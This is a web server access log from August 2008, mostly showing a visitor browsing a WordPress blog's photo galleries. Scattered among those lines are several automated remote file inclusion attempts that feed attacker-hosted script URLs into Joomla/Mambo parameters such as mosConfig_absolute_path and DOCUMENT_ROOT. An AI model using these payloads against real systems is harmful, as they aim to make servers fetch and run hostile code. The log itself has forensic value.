206.190.75.8 - - [21/Aug/2008:11:35:21 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:21 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:21 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:22 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&354 HTTP/1.1" 200 185990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-140_0.jpg HTTP/1.1" 200 302524 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
89.111.176.64 - - [21/Aug/2008:11:35:29 -0700] "GET /logs/access_080321.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:34 -0700] "GET /blog/index.php/2008/08/ HTTP/1.1" 200 10077 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:36 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&699 HTTP/1.1" 200 185990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:36 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0027.jpg HTTP/1.1" 200 494363 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
74.6.22.186 - - [21/Aug/2008:11:35:38 -0700] "GET /logs/access_070819.log HTTP/1.0" 200 28182 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:38 -0700] "GET /blog/index.php/2008/06/ HTTP/1.1" 200 10249 "http://dmulk.com/blog/2008/08/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:39 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&631 HTTP/1.1" 200 185990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:40 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0047.jpg HTTP/1.1" 200 355990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:35:40 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9944 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:45 -0700] "GET /blog/index.php/2008/06/09/ HTTP/1.1" 200 10118 "http://dmulk.com/blog/2008/06/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:46 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&967 HTTP/1.1" 200 185990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-266.jpg HTTP/1.1" 200 507726 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
80.67.19.125 - - [21/Aug/2008:11:35:48 -0700] "GET /logs/access_080312.log//admin/index.php?o=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:11:35:49 -0700] "GET //admin/index.php?o=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:11:35:49 -0700] "GET /logs//admin/index.php?o=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:51 -0700] "GET /blog/index.php/2008/08/ HTTP/1.1" 200 10077 "http://dmulk.com/blog/2008/06/09/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:53 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&859 HTTP/1.1" 200 185990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-031_2.jpg HTTP/1.1" 200 387600 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:58 -0700] "GET /blog/index.php/2008/08/page/2/ HTTP/1.1" 200 11320 "http://dmulk.com/blog/2008/08/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:58 -0700] "GET /blog/wp-includes/images/smilies/icon_smile.gif HTTP/1.1" 200 174 "http://dmulk.com/blog/2008/08/page/2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:59 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&347 HTTP/1.1" 200 185990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:59 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=5&277 HTTP/1.1" 200 3451 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:59 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0133.jpg HTTP/1.1" 200 332948 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:35:59 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1009.jpg HTTP/1.1" 200 366579 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:05 -0700] "GET /blog/index.php/2008/08/page/3/ HTTP/1.1" 200 68408 "http://dmulk.com/blog/2008/08/page/2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:05 -0700] "GET /blog/wp-content/gallery/westoc-2008/westoc2008.jpg HTTP/1.1" 200 232814 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-034.jpg HTTP/1.1" 200 333874 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-002.jpg HTTP/1.1" 200 362636 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-008.jpg HTTP/1.1" 200 371220 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-023.jpg HTTP/1.1" 200 426657 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-041.jpg HTTP/1.1" 200 539643 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-004.jpg HTTP/1.1" 200 471778 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-036.jpg HTTP/1.1" 200 398131 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-006_0.jpg HTTP/1.1" 200 415659 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-013_0.jpg HTTP/1.1" 200 310891 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-018_0.jpg HTTP/1.1" 200 198343 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-020_0.jpg HTTP/1.1" 200 331360 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-048.jpg HTTP/1.1" 200 554270 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-032_0.jpg HTTP/1.1" 200 354402 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-031_0.jpg HTTP/1.1" 200 395541 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-050.jpg HTTP/1.1" 200 554749 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-037_0.jpg HTTP/1.1" 200 187217 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-046_0.jpg HTTP/1.1" 200 506535 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-036_0.jpg HTTP/1.1" 200 433253 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-033_0.jpg HTTP/1.1" 200 419870 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:09 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=4&445 HTTP/1.1" 200 157653 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:09 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0&646 HTTP/1.1" 200 185990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-034_0.jpg HTTP/1.1" 200 228191 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-038_0.jpg HTTP/1.1" 200 247996 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-039.jpg HTTP/1.1" 200 290116 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-057.jpg HTTP/1.1" 200 296483 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-058.jpg HTTP/1.1" 200 346083 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-064.jpg HTTP/1.1" 200 272327 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:36:10 -0700] "GET /logs/access_080722.log/admin.php?DOCUMENT_ROOT=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-060.jpg HTTP/1.1" 200 527475 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-053.jpg HTTP/1.1" 200 344197 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-082.jpg HTTP/1.1" 200 430958 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-081.jpg HTTP/1.1" 200 293692 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-085.jpg HTTP/1.1" 200 554606 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-126.jpg HTTP/1.1" 200 743530 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-029_3.jpg HTTP/1.1" 200 404928 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-074.jpg HTTP/1.1" 200 543648 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-084.jpg HTTP/1.1" 200 482979 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-086.jpg HTTP/1.1" 200 531521 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-066.jpg HTTP/1.1" 200 315323 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-083.jpg HTTP/1.1" 200 465831 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-093.jpg HTTP/1.1" 200 494177 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-097.jpg HTTP/1.1" 200 469431 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-096.jpg HTTP/1.1" 200 506148 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:36:15 -0700] "GET /logs/access_080718.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-087.jpg HTTP/1.1" 200 649120 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-100.jpg HTTP/1.1" 200 611668 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-098.jpg HTTP/1.1" 200 643965 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-102.jpg HTTP/1.1" 200 456052 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-099.jpg HTTP/1.1" 200 644247 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-106.jpg HTTP/1.1" 200 552341 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-079.jpg HTTP/1.1" 200 314695 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
74.6.22.186 - - [21/Aug/2008:11:36:18 -0700] "GET /bikes/dteel/2008_02_16/?N=D HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:36:18 -0700] "GET /logs/access_080718.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-103.jpg HTTP/1.1" 200 574026 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-109.jpg HTTP/1.1" 200 499830 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-118.jpg HTTP/1.1" 200 384886 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-112.jpg HTTP/1.1" 200 681132 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:36:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-114.jpg HTTP/1.1" 200 607043 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
